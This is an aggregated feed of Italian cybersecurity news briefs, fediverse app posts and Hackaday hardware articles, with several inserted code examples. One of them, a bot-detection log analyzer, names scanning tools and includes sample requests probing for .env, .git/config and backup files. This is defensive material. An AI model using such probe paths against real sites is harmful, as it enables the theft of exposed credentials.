


Data breach and DDoS attack on Internet Archive: what to do to keep your data safe


Three near-simultaneous attacks against Internet Archive, the non-profit that archives the "history" of the Internet. Between late September and 9 October, a data breach, a DDoS attack and a defacement were recorded.

The article Data breach and DDoS attack on Internet Archive: what to do to keep your data safe comes from Cyber Security 360.



NIS 2: third-party risk management and the role of companies as suppliers


Entrusting business activities and processes to external suppliers is an increasingly common strategy for companies seeking specialist skills and better operational efficiency. However, growing dependence on third parties can introduce significant risks that must be managed in light of the obligations and responsibilities introduced by NIS 2.

The article NIS 2: third-party risk management and the role of companies as suppliers comes from Cyber Security 360.



The cyber threat is global: a collective response is needed, but SMEs are missing


At Cybertech Europe 2024 in Rome the national cyber security community met to take stock of an increasingly global threat. But the main guest was missing: the absence of SMEs forces everyone to reflect deeply on how cyber security is talked about.

The article The cyber threat is global: a collective response is needed, but SMEs are missing comes from Cyber Security 360.



Legitimate interest: the EDPB clarifies the boundaries of applicability and the centrality of accountability


The guidelines on legitimate interest, just published by the EDPB and now in public consultation until 20 November, offer an integrated and detailed view that clarifies the boundaries of applicability, defining the criteria for a proper balance between the controller's needs and the protection of individuals. The key points.

The article Legitimate interest: the EDPB clarifies the boundaries of applicability and the centrality of accountability comes from Cyber Security 360.



Privacy in the Red Cross: an example of applying data protection to a local committee


Here is a practical guide on how the personal data protection rules apply to third-sector organisations, with a specific focus on the effective implementation of a privacy management system in a local committee of the Italian Red Cross.

The article Privacy in the Red Cross: an example of applying data protection to a local committee comes from Cyber Security 360.



XDR (eXtended Detection and Response) systems: what they are for, how they work, the most effective ones


XDR (eXtended Detection and Response) systems are integrated security solutions that monitor not only endpoints but also email gateways, cloud services and access. Here is what they are, how they work, the best configuration approaches and the solutions to adopt in the enterprise.

The article XDR (eXtended Detection and Response) systems: what they are for, how they work, the most effective ones comes from Cyber Security 360.



Lua malware hits gamers with fake game cheats: how to protect yourself


New malware written in Lua is targeting gamers by hiding inside fake cheats and managing to evade antivirus software and security tools. Here are the technical details for recognising it and the security measures to adopt against it.

The article Lua malware hits gamers with fake game cheats: how to protect yourself comes from Cyber Security 360.



@ new version 0.1.0-beta09 available!

Changelog:


  • enhancement: opening reply from conversation to avoid "double back" issue
  • enhancement: use more visible reblog icon
  • enhancement: add top bar button to dismiss all notifications
  • enhancement: migrate inbox to markers API
  • enhancement: improve vertical spacing for content footer and composer header
  • fix: view post as replies and forum mode on Mastodon instances.

#friendica #friendicadev #fediverseapp #androiddev #mobileapp #kotlin #multiplatform #kmp #compose #opensource #livefasteattrash


in reply to Noam Bergman

@Noam Bergman yes, you're welcome if you want to try it out and report bugs, it's still in beta currently.

You can find the APK in the release page, otherwise you can install an app like Obtainium and add the main repository URL as a source (please remember to turn on the "enable pre-releases" switch in Obtainium to install pre-production releases).


in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻‍💻🍕

OK, I'm a complete Luddite in these things. Failed with Obtainium, but managed to install from APK. Will let you know how I get on.


0-Day vulnerability in IntelX: an opportunity for hackers and governments?


A cybercriminal on an underground forum has recently put up for sale a 0-day vulnerability affecting IntelX, a powerful search engine used by investigators, journalists and security professionals to retrieve information from public and private sources on the Internet.

The user, going by the name "kittykitten", is offering the vulnerability in exchange for payment and lists Telegram as the contact method for further details and proof.

IntelX is known for its ability to reach information that is hard to find, such as deleted or hidden documents, data archives, metadata and deep and dark web sources.

It is a particularly useful tool for digital investigations, but also an extremely sensitive one, since a compromise of the system could expose sensitive data or enable unauthorised access to private information.

At the moment we cannot confirm the truth of the report, since the organisation has not yet released any official press statement on its website about the incident. This article should therefore be treated as an 'intelligence source'.

Details


The offer was published on 7 October 2024 at 02:40 AM under the title "IntelX 0Day Vulnerability". The seller claims to be in possession of a vulnerability affecting IntelX and invites potential buyers to contact them via Telegram for further details. No further specifics about the vulnerability are shared in the post itself, which is common in these cases so that others cannot exploit it without buying it.

The post also carries keyword strings such as "intelx vulnerability 0day russia usa brazil brasil saudi arabia arab india", suggesting that the seller wants to attract an international audience, including states or cybercriminal groups in various parts of the world. Such actors could be interested in obtaining access to confidential information for espionage or other cyber operations.

The seller offers further proof of the vulnerability via Telegram, an app often used for private communications, which makes it hard to trace the identity or location of the offerer.

Conclusions


The offer of a 0-day vulnerability for IntelX on an underground forum highlights the fragility of even the most sophisticated and important platforms. The fact that the offer is aimed at a global audience, with specific mentions of countries such as Russia, the USA, Brazil and Saudi Arabia, suggests that this kind of vulnerability could end up in the hands of espionage groups or other malicious organisations.

The sale of this IntelX vulnerability is only one of many episodes showing how important it is not to lower one's guard in digital security.

As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving prominence to the issue.

RHC will monitor developments so as to publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.

The article 0-Day vulnerability in IntelX: an opportunity for hackers and governments? comes from il blog della sicurezza informatica.




Farewell to Obsolete Protocols: Microsoft Deprecates PPTP and L2TP


Microsoft has officially announced the deprecation of the PPTP (Point-to-Point Tunneling Protocol) and L2TP (Layer 2 Tunneling Protocol) protocols from future versions of Windows Server.

It is clear that the company is stepping up its efforts to remove from the operating system the technologies it considers obsolete.

After the recent announcement of the deprecation of the WSUS service (read the full article), the same fate now awaits PPTP and L2TP, long known to be insecure and subject to vulnerabilities.

Overview


With the rapid evolution of cyber threats, PPTP and L2TP are no longer considered robust enough to meet modern security standards for VPN connections, and Microsoft has finally classified them as obsolete protocols.

PPTP has been known for many years to be badly insecure: its MS-CHAPv2 authentication can be cracked offline by brute force. Using this VPN protocol today is extremely risky for a company.

L2TP provides no encryption on its own unless it is paired with another protocol such as IPsec. Even then, a misconfigured L2TP/IPsec deployment can introduce weaknesses that make it vulnerable to attack.

For these reasons, Microsoft now recommends that users move to the two remaining built-in VPN protocols, SSTP (Secure Socket Tunneling Protocol) and IKEv2 (Internet Key Exchange version 2), both of which offer better performance and security.

Although the company made the announcement only recently, the protocols will still be included in Windows Server 2025. It is important to remember that deprecation does not mean immediate removal. "Deprecated features continue to work and are fully supported until they are officially removed," Microsoft stated.

Conclusion


Deprecating PPTP and L2TP is a necessary step to maintain the highest security standards. IT administrators still using these protocols should start working on a modernisation and transition plan towards more secure protocols, in order to improve the security and performance of their VPN connections.

The article Farewell to Obsolete Protocols: Microsoft Deprecates PPTP and L2TP comes from il blog della sicurezza informatica.



An 8-year-old bug has been fixed in the Jetpack plugin for WordPress


The developers of the Jetpack plugin for WordPress have released a security update to fix a critical vulnerability that allowed logged-in users to read forms submitted by other visitors to the site.

Jetpack, owned by Automattic, provides a comprehensive set of tools to improve site security and performance. According to the plugin's website, it is used on 27 million WordPress sites.

The vulnerability was discovered in Jetpack's contact form feature during an internal security audit. It has existed since version 3.9.9, released in 2016. The flaw allowed any logged-in user on a site, without being authorised to do so, to view data submitted by visitors through the site's forms.

Jetpack's Jeremy Herve noted that the developers worked closely with the WordPress.org security team to automatically update the plugin to a secure version on all installed sites.

The fix was shipped in 101 Jetpack releases, covering every supported branch from 13.9.1 back to 3.9.10. A full list of affected versions has been published on the developer's website.

Although there is currently no information that the vulnerability has been exploited by attackers, the risk of exploitation becomes real once the details are public.

The article An 8-year-old bug has been fixed in the Jetpack plugin for WordPress comes from il blog della sicurezza informatica.



How do I teach my phone's keyboard not to autocorrect "ce" to "c'è"?
Of all the misdeeds of autocorrect, this is the one that drives me up the wall the most.
#fediaiuto #fedihelp


@ciccillo I tried doing what @Jones did; now autocorrect is off, but the suggestion bar remains. Now there's (c'è ⬅️ it works!) no more excuse: if I write "ammerda" it's my fault!
in reply to floreana

Hi, I'm new here, in this world. I saw that you write in Italian, and I also came across a message of yours about autocorrect changing "c'è" into "ce". If this message reaches you and you read it, I may have stated the obvious as a solution to the problem.
Bye.


An Arduino Triggers a Flash With Sound



To capture an instant on film or sensor with a camera, you usually need a fast shutter. Alternatively, a flash can be triggered with the scene in the dark and the shutter wide open. It’s this latter technique which PetaPixel are looking at courtesy of the high-speed class at Rochester Institute of Technology. They’re using a cheap sound sensor module and an Arduino to catch instantaneous photographs, with students caught in the act of popping balloons.

The goal here was to keep things as simple as possible. All you’ll need in addition to the Arduino (or really, any modern microcontroller) is the sound sensor — which are often sold as “microphone shields.” To trigger the flash while still providing electrical isolation is a reed relay. The write-up notes that higher performance systems would be better off with an optoisolator, but this provides a low-cost alternative to get started with.


We rather like the technique, and perhaps it’s a thing to try at a future hacker camp. Unsurprisingly it’s not the first flash trigger for water balloons we’ve seen.


hackaday.com/2024/10/15/an-ard…



Today I realized how similar RFL and RFF look at the surface: bottom navigation with identical sections, navigation drawer, a timeline in the home screen, each post with header, content, media, actions.

They look like an elder and a younger brother. But there are some differences too:


  • RFL uses SQLDelight for persistence, whereas RFF uses Room multiplatform;
  • RFL uses Voyager's Bottom sheet navigator, RFF plain Material3 ModalBottomSheets;
  • RFL uses coil2 for image rendering on Android and Kamel on iOS, RFF uses coil3 for both platforms;
  • RFL makes heavy usage of the slide-to-reveal pattern for like/dislike actions, RFF doesn't and does not allow dislike (even if on Friendica it could be technically done);
  • RFL has many customization options (zombie mode, different post layouts, many more languages etc.), RFF tries to have "sane defaults" and has a more minimalistic approach;
  • RFL has a "sidebar" on the right side which RFF does not have (again, minimalism);
  • RFL does not use a third party crash reporting and feedback system, RFF uses Sentry;
  • RFL has Android-only tests even for common code using MockK, RFF has common tests using Mokkery.

Have you tried both apps? Is there any feature of one app that you would like to be ported on the other one?

#fediverseapp #mobileapp #mobiledev #androiddev #kotlin #multiplatform #compose #opensource




Assessing Developer Productivity When Using AI Coding Assistants



We have all seen the advertisements and glossy flyers for coding assistants like GitHub Copilot, which promised to use ‘AI’ to make you write code and complete programming tasks faster than ever, yet how much of that has worked out since Copilot’s introduction in 2021? According to a recent report by code analysis firm Uplevel there are no significant benefits, while GitHub Copilot also introduced 41% more bugs. Commentary from development teams suggests that while the coding assistant makes writing code faster, debugging or maintaining that code often is not.

None of this should be a surprise, of course, as this mirrors what we already found when covering this topic back in 2021. With GitHub Copilot and kin being effectively Large Language Models (LLMs) that are trained on codebases, they are best considered to be massive autocomplete systems targeting code. Much like with autocomplete on e.g. a smartphone, the experience is often jarring and full of errors. Perhaps the most fair assessment of GitHub Copilot is that it can be helpful when writing repetitive, braindead code that requires very little understanding of the code to get right, while it’s bound to helpfully carry in a bundle of sticks and a dead rodent like an overly enthusiastic dog when all you wanted was for it to grab that spanner.

Until Copilot and kin develop actual intelligence, it would seem that software developer jobs are still perfectly safe from being taken over by our robotic overlords.


hackaday.com/2024/10/15/assess…



How democracy went extinct in the United States. l'AntiDiplomatico interviews Chris Hedges - EGEMONIA - L'Antidiplomatico
lantidiplomatico.it/dettnews-c…




Solve: An ESP32-Based Equation Solving Calculator



We’re suckers for good-looking old-school calculators, so this interesting numerical equation-solving calculator by [Peter Balch] caught our attention. Based around the ESP32-WROOM-32 module and an LCD, the build is quite straightforward from an electronics point of view, with the main work being on the software side of things.

A custom keyboard was constructed on Veroboard using a handful of tactile switches arranged in a charlieplexing array to minimize the number of IO pins consumed. For the display, an off-the-shelf 240×320 ILI9341-based module hooked up by SPI was used. A single lithium cell was used for the power supply, connected to a USB charger module, but you could just as easily substitute a 3 x AA battery box. The case was designed in DesignSpark Mechanical and 3D printed. It’s unclear which keyboard version they settled on; there are options for one with keycaps and one without. Regardless, a 3D-printed frame sits atop the keyboard circuit, with the graphics printed on photo paper and a protective cover sheet on top.

[Image caption: You don’t need much to make a usable keyboard.]

The most interesting part of this project is the software and [Peter]’s extensive explanation of the pros and cons of the various numerical-solving algorithms. “Solve,” as they call the project, uses five methods to solve single-variable equations and Newton-Raphson for simultaneous equations. The exact method depends on the types of functions used in the equations and whether they are continuous.

Additionally, the calculator software supports looping constructs, allowing the generation of results tables and multivariable graph plotting. All in all, it could be a helpful desktop addition for someone needing a dedicated solver. Check out the project GitHub page for more details of the construction and software and to start building your own.
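The two solver families named above, as an added example (this is not [Peter]'s code from the Solve project): Newton-Raphson for simultaneous equations with a finite-difference Jacobian, and bisection as one of the derivative-free single-variable methods that only requires the function to change sign across the bracket. The sample equations (a circle intersected with a line, and cos x = x) are constructed for the demonstration.

```python
"""Numerical equation solving: Newton-Raphson for systems, bisection for
one variable. Added example, not the Solve calculator's own code."""
import math


def jacobian(f, x, h=1e-7):
    """Forward-difference Jacobian J[i][j] = d f_i / d x_j."""
    fx = f(x)
    J = [[0.0] * len(x) for _ in fx]
    for j in range(len(x)):
        xp = list(x)
        xp[j] += h
        fp = f(xp)
        for i in range(len(fx)):
            J[i][j] = (fp[i] - fx[i]) / h
    return J


def solve_linear(A, b):
    """Gaussian elimination with partial pivoting; raises if the matrix is singular."""
    n = len(b)
    M = [list(row) + [b[i]] for i, row in enumerate(A)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(M[r][col]))
        if abs(M[piv][col]) < 1e-14:
            raise ZeroDivisionError("singular Jacobian; Newton step undefined")
        M[col], M[piv] = M[piv], M[col]
        for r in range(col + 1, n):
            factor = M[r][col] / M[col][col]
            for c in range(col, n + 1):
                M[r][c] -= factor * M[col][c]
    x = [0.0] * n
    for i in range(n - 1, -1, -1):  # back substitution
        x[i] = (M[i][n] - sum(M[i][j] * x[j] for j in range(i + 1, n))) / M[i][i]
    return x


def newton_system(f, x0, tol=1e-10, max_iter=50):
    """Solve f(x) = 0 for a vector x. Returns (x, converged)."""
    x = list(x0)
    for _ in range(max_iter):
        fx = f(x)
        if max(abs(v) for v in fx) < tol:
            return x, True
        dx = solve_linear(jacobian(f, x), [-v for v in fx])  # J dx = -f
        x = [xi + di for xi, di in zip(x, dx)]
    return x, False


def bisection(g, a, b, tol=1e-12, max_iter=200):
    """Root of scalar g on [a, b]; g(a) and g(b) must have opposite signs.
    Needs no derivative and tolerates kinks, unlike Newton's method."""
    ga, gb = g(a), g(b)
    if ga * gb > 0:
        raise ValueError("g(a) and g(b) must have opposite signs")
    for _ in range(max_iter):
        m = 0.5 * (a + b)
        gm = g(m)
        if gm == 0 or (b - a) < tol:
            return m
        if ga * gm < 0:
            b, gb = m, gm
        else:
            a, ga = m, gm
    return 0.5 * (a + b)


def circle_line(v):
    """Constructed system: x^2 + y^2 = 4 intersected with the line x = y."""
    x, y = v
    return [x * x + y * y - 4.0, x - y]


if __name__ == "__main__":
    print(newton_system(circle_line, [1.0, 1.0]))          # ~ (sqrt 2, sqrt 2)
    print(bisection(lambda x: math.cos(x) - x, 0.0, 1.0))  # ~ 0.739085
```

The dispatch the calculator performs (choosing a method by function type and continuity) reduces here to: use `newton_system` when the functions are smooth and a decent starting point exists, and fall back to a bracketing method such as `bisection` when only a sign change is known.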

The subject of calculators is very personal, especially for engineers and scientists. Here’s our word on maybe the last physical scientific calculator. Of course, we’ve covered so many DIY calculator builds that we’ve lost count. Here’s a great example. Finally, who needs electronics when you can do it mechanically? Batteries not included.


hackaday.com/2024/10/15/solve-…



Discovering Bots! From Googlebot to Malicious Botnets, Here Is What You Need to Know


Bots are software applications designed to perform tasks on the Internet automatically. These tasks are generally simple and can be completed faster than a human could do them online. Bots can perform a wide range of activities, from indexing web pages for search engines to sending spam or attacking websites.

Some bots are legitimate, such as Googlebot, which crawls the Internet and builds the index for Google's search engine. But there are also malicious bots that look for website vulnerabilities and launch attacks.

What is a botnet


A common use of bots is the botnet. A botnet is a network of infected devices controlled through a central command-and-control system. Once a device has been infected, it starts executing the commands issued by the "bot master", the person who controls the botnet.

Botnets are often used to launch DDoS (distributed denial of service) attacks, in which a large number of infected devices send requests to a server at the same time, overloading it and taking it down. Botnets can also be used for spamming, account hacking and other malicious activities.

Types of bots


There are many types of bots on the Internet, both useful and harmful. Let's look at the most common kinds:

  • Spider bots: also known as web spiders or crawlers, these bots scan web pages to index their content for search engines. Search crawlers load HTML, CSS, JavaScript and other resources to analyse the site's content.
  • Scraper bots: scraper bots collect data from websites and store it for later use. They can copy a page's entire content as well as individual elements, such as product prices or contact details.
  • Spam bots: spam bots harvest email addresses in order to send spam. Such bots can find email addresses on websites, social networks and other resources.
  • Social media bots: these bots operate on social networks by automatically creating posts, liking, commenting or following other users. Social bots are used to promote ideas, manipulate public opinion and create fake accounts.
  • Download bots: download bots automatically download programs or applications. They can be used to artificially inflate app download statistics in app stores.


How to detect bots on a website


To identify bots on a website, you can use several indicators in your web analytics:

  • Traffic spikes, especially outside business hours.
  • Unusually high or low bounce rate (bots may hit a page and leave).
  • Unusual traffic sources (for example, a large volume of direct traffic from new IP addresses).
  • Degraded server performance.
  • Unusual activity from unknown IP addresses or from regions where you have no customers.


How to stop bots


To protect against bots, you can use the following basic measures:

  • Configure a robots.txt file to control bot access to your site (effective only against well-behaved bots).
  • Add a CAPTCHA to registration, comment or download forms.
  • Set up JavaScript-based alerts to monitor suspicious activity.


How bots evade detection


Bot technology has evolved over time. Bots began as simple scripts that sent requests to a website to fetch data or perform actions. These scripts did not accept cookies or execute JavaScript, which made them easy to detect.

Over time, bots became more sophisticated, accepting cookies and executing JavaScript, but they were still relatively easy to spot because they interacted less with dynamic page elements than humans do.

The next stage in bot development was the use of headless browsers such as PhantomJS, which can fully process a site's content. Although such browsers are harder to detect, they still cannot perform every action a real user performs.

The most advanced type of bot is based on the Chrome browser and is practically indistinguishable from real users. These bots even imitate human activity, such as clicking on page elements.

Advanced methods of protection against bots


As bots have evolved, so have the methods for detecting and blocking them. There are three main approaches to detecting and mitigating malicious bot activity:

  • Static approach: analyse the requests and headers associated with bots and block them based on the identified characteristics.
  • Challenge-based approach: test each visitor's ability to handle cookies, JavaScript and CAPTCHAs to determine whether it is a bot.
  • Behavioural approach: study visitor behaviour and compare it with the norm to identify deviations characteristic of bots.

These methods can be used alone or in combination to provide more effective bot protection. In addition, specialised bot-management services can monitor and block malicious activity.

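The detection indicators listed earlier and the static and behavioural approaches just described can be applied directly to a web server's access log. The following is an added example, not code from the article: it parses a few constructed Apache combined-format log lines and flags clients by User-Agent (static), page-request rate, absence of JS/CSS/image loads behind a browser User-Agent, and 404 ratio (behavioural). The thresholds and the tool-UA substrings are assumptions chosen for illustration; reverse-DNS verification of crawlers that claim to be Googlebot is deliberately left out because it needs network access.

```python
"""Heuristic bot detection over access-log lines. Added example; the log
lines below are constructed, not real traffic."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
ASSET_EXT = (".js", ".css", ".png", ".jpg", ".gif", ".ico", ".woff2")
# Static approach: substrings that identify scripted clients rather than browsers (assumed list)
TOOL_UA_HINTS = ("python-requests", "curl/", "go-http-client", "sqlmap", "nikto")


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, max_pages_per_min=60, min_pages=5):
    """Group requests per client IP; return {ip: [reasons]} for suspicious clients."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        reasons = []
        ua = recs[0]["ua"]
        pages = [r for r in recs if not r["path"].lower().endswith(ASSET_EXT)]
        assets = len(recs) - len(pages)
        span = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()

        # Behavioural: page-request rate (assets excluded so one normal page load does not trip it)
        if len(pages) >= min_pages:
            ppm = len(pages) * 60.0 / max(span, 1.0)
            if ppm > max_pages_per_min:
                reasons.append(f"rate {ppm:.0f} page requests/min")

        # Static: empty or tool-like User-Agent
        if not ua or any(h in ua.lower() for h in TOOL_UA_HINTS):
            reasons.append(f"tool user-agent: {ua or '<empty>'}")

        # Behavioural: claims to be a browser but never loads JS/CSS/images
        if "mozilla" in ua.lower() and len(pages) >= min_pages and assets == 0:
            reasons.append("browser user-agent but no JS/CSS/image requests")

        # Behavioural: mostly 404s means probing for files that do not exist
        not_found = sum(1 for r in recs if r["status"] == 404)
        if len(recs) >= min_pages and not_found / len(recs) > 0.5:
            reasons.append(f"{not_found}/{len(recs)} responses were 404 (path probing)")

        if reasons:
            findings[ip] = reasons
    return findings


def _line(ip, second, path, status, ua):
    """Build one constructed combined-format line (all on 15 Oct 2024, 10:00 UTC)."""
    return (f'{ip} - - [15/Oct/2024:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0 Safari/537.36"

SAMPLE_LOG = (
    # A person: one page, then its assets, a couple of seconds apart
    [_line("203.0.113.10", 0, "/", 200, BROWSER_UA),
     _line("203.0.113.10", 1, "/static/app.js", 200, BROWSER_UA),
     _line("203.0.113.10", 1, "/static/style.css", 200, BROWSER_UA)]
    # A scraper: eight product pages in four seconds, browser UA, never an asset
    + [_line("198.51.100.7", i // 2, f"/product/{i}", 200, BROWSER_UA) for i in range(8)]
    # A scanner: scripted client probing for files that do not exist
    + [_line("192.0.2.44", i // 2, p, s, "python-requests/2.32")
       for i, (p, s) in enumerate([("/", 200), ("/.env", 404), ("/wp-login.php", 404),
                                   ("/.git/config", 404), ("/admin", 404), ("/backup.zip", 404)])]
)

if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Run as a script it flags the scraper and the scanner and leaves the human visitor alone. The rules are deliberately per-IP and stateless; a Chrome-based bot that loads assets at a human pace, as described above, passes all of them, which is exactly why the challenge-based and behavioural approaches are layered on top of static checks in practice.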
The article Discovering Bots! From Googlebot to Malicious Botnets, Here Is What You Need to Know comes from il blog della sicurezza informatica.



A Phone? A Ham Radio? Relax! It’s Both!



A lot of hams like to carry a VHF radio. Of course, nearly everyone wants to carry a phone. Now, thanks to the kv4p HT, you don’t have to carry both. The open-source device connects to your Android smartphone and turns it into a radio transceiver. You can build it yourself for about $35. Check out the video below.

The device uses an ESP32 and only transmits one watt, but it has lots of features like APRS and scanning.

The brain is an ESP-WROOM-32. There’s also a ham radio “module” that is easily imported. The rest is fit, finish, and software. The PCB is fairly simple and inexpensive. A 3D-printed case completes things.

There is a new version of the PCB that hasn’t been tested as of this post, but the older version (1.5) seems to work ok, too, if you don’t want to risk trying the 1.6 version and you don’t want to wait.

We always marvel at how many building blocks you can get now. Grab a computer and a radio, and use your phone for power and a user interface. This would have been an enormous project to complete not long ago and now it is an hour’s time and $35. You’ll probably spend as much time ordering parts as building.

If your phone mostly trades cat memes, it fits right in with old ham tech. Just watch the antenna.

youtube.com/embed/9eXHgktFD-U?…


hackaday.com/2024/10/15/a-phon…



Your Battery Holder Is Also Your Power Switch With ToggleSlot



We really like PCB-level hacks, especially ones that show ingenuity in solving a real problem while being super cheap to implement. Hackaday.IO user [Steph] wanted a cheap way to switch a wearable on and off without having to keep popping out the battery, so they came up with a tweaked battery footprint, which is also a simple slide switch.

Most people making badges and wearables will follow the same well-trodden path of just yanking out the cell or placing some cheap switch down and swallowing the additional cost. For [Steph], the solution was obvious. By taking a standard surface-mount CR2032 button cell holder footprint, extending its courtyard vertically, and moving the negative pad up a smidge, the battery can be simply slid up to engage the pad and slid down to disengage and shut off the juice. The spring section of the positive terminal keeps enough pressure on the battery to prevent it from sliding out, but if you are worried, you can always add a dummy pad at the bottom, as well as a little solder bump to add a bit more security.

Now, why didn’t we think of this before? The KiCad footprint file can be downloaded from the project GitHub page, imported into your project and used straight away.

Many of our gadgets are powered by CR2032 cells—so many so that eliminating the need for them leads to interesting projects, like this sweet USB-powered CR2032 eliminator. But how far can you push the humble cell? Well, we held a contest a few years ago to find out!


hackaday.com/2024/10/15/your-b…



Europa Clipper probe launched toward Jupiter | Astronomia.com

"The aim of the mission is to study the icy moon Europa up close to test its potential to host life, but not to verify its existence: in particular it will have to confirm the existence and composition of water beneath the surface ice layer and study the surface and its features from a geological standpoint."

astronomia.com/2024/10/15/lanc…



A parliamentary intergroup is born in defence of handwriting and reading on paper

@Politica interna, europea e internazionale

“Writing by hand in cursive and reading on paper are indispensable habits because they stimulate and develop the left hemisphere of the brain, the one that governs logical-linear thinking. Losing these habits



‼️Our dear Stefania Maurizi could not leave #IlPotereSegreto without the happy ending and without explaining to you why they STILL want to destroy Julian #Assange and #WikiLeaks. Or did you think it was over?

In bookshops on 25 October.




Experimenting with MicroPython on the Bus Pirate 5



I recently got one of the new RP2040-based Bus Pirate 5 (BP5), a multi-purpose interface debugging and testing tool. Scanning the various such tools in my toolbox already: an Analog Discovery 2, a new Glasgow Interface Explorer, and a couple of pyboards, I realized they all had a Python or Micropython user interface. A few people on the BP5 forums had tossed around the idea of MicroPython, and it just so happened that I was experimenting with building beta versions of MicroPython for a RP2350 board at the time. Naturally, I started wondering, “just how hard can it be to get MicroPython running on the BP5?”

The Lazy Approach


Rather than duplicating the BP5 firmware functionality, I decided to ignore it completely and go with existing MicroPython capabilities. I planned to just make a simple set of board definition files — perhaps Board Support Package (BSP) is a better term? I’ve done this a dozen times before for development and custom boards. Then write a collection of MicroPython modules to conform to the unique aspects in the BP5 hardware. As user [torwag] over on the BusPirate forums said back in March:

Micropython comes already with some modules and enough functions to get some stuff out-of-the-box working. E.g. the infamous version of “hello world” for microcontrollers aka led-blinking.

The Tailoring


The main interfaces to the BP5’s RP2040 MCU were apparently done with the Pico reference design in mind. That is why you can just load and run the latest RP2 MicroPython build without defining a custom board (note that this only worked with the current v1.24, and failed when I tried to load v1.23 using Thonny, something I did not investigate further). But there are some things that can be done to tweak the build, so I did go ahead and make a set of custom board definition files for the BP5.

First I tried to tell MicroPython about the larger QSPI flash. This is a standard thing in configuring MicroPython, but I found an issue with the RP2. The Pico C SDK has a 2 MiB hard-coded flash limit in a linker script. One can fix this by hand editing and rebuilding the SDK, something I decided to leave for later. So I did all my testing using just 2 MiB of the flash.

Several of the customizations that I would normally make, like the serial interface pin assignments, were not necessary. The customization I did make was for help files. Since the intended application of this project is manual debugging, I wanted the modules and functions to have help text. By default, MicroPython builds on the RP2 do not enable __doc__ strings, but they can be re-enabled with a compiler directive. Unfortunately, while the __doc__ strings are now retained, the built-in help() function doesn’t print them like CPython does. The workaround is to add a help() function to each class. So instead of help(adc) you’d type adc.help().

Finally, I wanted to add a board top-level help screen, appending to the existing RP2 port help screen. That turned out to be much harder to do, and in the end, I just gave up doing that in the BP5 board definition folder. Instead, I kludged a couple of files in the RP2 port directory — ugly, but this is just an experiment after all.

The Interfaces


These are the basic interfaces of the BP5 hardware, and all of them are already or easily supported in MicroPython.

  • Eight Buffered IO pins
  • Programmable Power Supply
  • NAND flash 1Gbit
  • IPS LCD screen, 320 x 240 pixels
  • 18 RGB LEDs
  • Push button

Going for some instant gratification, I decided to drive the chain of LEDs around the perimeter of the unit first. The RP2 port of MicroPython already has a Neopixel class. Once I sorted out the chained shift register I/O expansion circuitry, I was running MicroPython and blinking LEDs in no time. The eight main buffered I/O signals posed a bit more challenge, because there are bidirectional logic level translators on each pin. After writing a BP5 I/O pin wrapper class around the regular MP Pin class to handle that aspect of the hardware, I realized that wasn’t quite enough.

But the digital I/O signals on the BP5 aren’t useful until you also control the adjustable voltage reference rail. That led to the Power supply class next, which in turn led to the Analog to Digital class to handle ADC operations. To do this, you need to control the analog MUX. And you need to drive the 74HC595 output expander shift register to select the desired analog MUX channel. No more instant gratification.

The shift register was pretty easy, as I have done this before. The only thing I noted was that there is no feedback, so you can’t read the current state. This requires instead that you keep a shadow register of the current output expander state.
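The shadow-register pattern described above, as an added example that is not the project’s own code: the 74HC595 has no readback path, so the only trustworthy copy of its output state is the one kept locally and re-sent in full on every change. The `shift_out` sink, the bit positions assigned to the analog MUX select lines, and the helper names are assumptions made for illustration, not the BP5’s actual pin map.

```python
class ShadowedOutputExpander:
    """Model of a write-only 74HC595-style output expander kept behind a shadow register.

    Added example, not code from the Bus Pirate or MicroPython projects. `shift_out` is a
    hypothetical sink standing in for the real SPI / bit-banged Pin transfer on hardware.
    """

    def __init__(self, n_bits=8, shift_out=None):
        self.n_bits = n_bits
        self._mask = (1 << n_bits) - 1
        self._shadow = 0                      # believed state of the chip's outputs
        self._sink = shift_out or (lambda value: None)
        self.writes = []                      # every value actually shifted out, oldest first

    @property
    def value(self):
        """Current shadow contents: what we believe the chip's outputs hold."""
        return self._shadow

    def _flush(self):
        # Always push the whole register: a 74HC595 cannot be updated one bit at a time,
        # so untouched bits are re-sent from the shadow copy.
        self.writes.append(self._shadow)
        self._sink(self._shadow)

    def set_bit(self, bit, level):
        if not 0 <= bit < self.n_bits:
            raise ValueError(f"bit {bit} out of range for a {self.n_bits}-bit expander")
        if level:
            self._shadow |= 1 << bit
        else:
            self._shadow &= self._mask & ~(1 << bit)
        self._flush()

    def get_bit(self, bit):
        """Read back from the shadow, since the chip itself cannot answer."""
        return (self._shadow >> bit) & 1

    def write_field(self, lsb, width, field_value):
        """Replace a contiguous `width`-bit field starting at `lsb`, leaving other bits untouched."""
        if field_value >> width:
            raise ValueError(f"{field_value} does not fit in {width} bits")
        field_mask = ((1 << width) - 1) << lsb
        self._shadow = (self._shadow & ~field_mask & self._mask) | (field_value << lsb)
        self._flush()

    def read_field(self, lsb, width):
        return (self._shadow >> lsb) & ((1 << width) - 1)


# Constructed layout for illustration only: assume the analog MUX select lines sit on
# expander bits 0..3 and bit 7 is an unrelated enable. The real BP5 assignment may differ.
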